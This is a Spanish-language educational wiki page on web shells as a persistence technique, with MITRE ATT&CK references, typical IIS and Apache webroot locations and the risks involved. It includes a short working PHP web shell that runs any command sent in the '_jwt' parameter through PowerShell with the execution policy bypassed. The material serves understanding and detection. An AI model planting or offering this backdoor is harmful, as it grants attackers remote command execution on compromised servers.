Web Shell

La persistencia es el grupo general de técnicas utilizadas para mantener el acceso a un sistema, aplicación o entorno de destino (TAOOO3).

Una shell web consta de uno o más scripts web cargados en un servidor web comprometido que habilitan funciones adicionales no autorizadas en ese servidor. Normalmente, esta funcionalidad equivale a una puerta trasera y puede habilitar funciones como la inyección remota de comandos, carga/descarga de archivos.

¿Como es una web shell?

Web Shells presentes en una variedad de formas y tamaños.

<?php
if(isset($_REQUEST['_jwt'])){
  echo "<pre>";
  $cmd = ($_REQUEST['_jwt']);
  system('powershell.exe -ep bypass -c '.$cmd);
  echo "</pre>";
  die;
}
?>

Este archivo PHP es el componente del lado del servidor del shell web y permite a un atacante emitir comandos arbitrarios al servidor web en el que está alojado. Cualquier comando recibido por el archivo PHP a través del parámetro "_jwt" en la URL se ejecutará como parte de un comando de PowerShell con el parámetro agregado de omitir la política de ejecución del sistema local. Al utilizar este shell web, un atacante podría ejecutar cualquier comando que pueda ejecutarse a través de PowerShell en el objetivo, y cualquier comando emitido de esta manera probablemente será ejecutado por el proceso del servidor web y bajo los permisos con los que opera.

Ejemplos más complejos

Los Web Shells también pueden ser puertas traseras más complicadas y con todas las funciones. Por ejemplo, la bifurcación del popular shell web PHP C99 contiene casi 5000 líneas de código y una variedad de funciones más fáciles de usar.

¿Dónde se encuentran?

Los shells web generalmente se colocan en una ubicación donde serán atendidos por el propio servidor web, generalmente dentro de la estructura de directorios debajo de la raíz web. Por ejemplo:

  • Webroot típico de IIS: \inetpub\wwwroot o sus subdirectorios.

  • Webroot típico de Apache: /var/www o sus subdirectorios.

Es posible que necesite determinar la raíz web para su aplicación de servidor web específica. Estas asignaciones de directorios se pueden personalizar. Para obtener mayor claridad sobre los directorios de shell web viables, consulte la configuración de los servidores web en su entorno y tenga en cuenta específicamente la raíz web, así como cualquier otro directorio que almacene componentes de aplicaciones dinámicas para el servidor web y cualquiera de sus complementos o complementos. .

Los riesgos

El principal riesgo asociado con un Web Shell es el acceso no autorizado persistente y el control de un servidor web o de aplicaciones.

Recursos

LogoPersistence, Tactic TA0003 - Enterprise | MITRE ATT&CK®
LogoServer Software Component: Web Shell, Sub-technique T1505.003 - Enterprise | MITRE ATT&CK®
LogoDefeat Web Shell WSO-NG | AkamaiAkamai Technologies
AnteriorInsecure Temporary FileSiguienteFile Upload Vulnerabilities

Última actualización